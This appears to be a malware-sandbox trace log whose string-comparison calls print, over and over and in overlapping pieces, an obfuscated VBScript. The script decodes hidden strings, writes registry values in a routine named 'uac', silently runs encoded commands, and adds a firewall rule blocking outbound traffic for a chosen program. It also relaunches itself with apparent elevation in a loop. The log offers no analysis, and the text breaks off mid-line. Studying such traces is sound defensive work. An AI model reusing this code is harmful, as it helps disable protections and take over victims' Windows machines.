bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 87 [0223.006] wcsncmp (_String1=" = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0223.007] wcsncmp (_String1="= false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 48 [0223.007] wcsncmp (_String1=" false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0223.007] wcsncmp (_String1="false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 89 [0223.007] wcsncmp (_String1="alse\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = 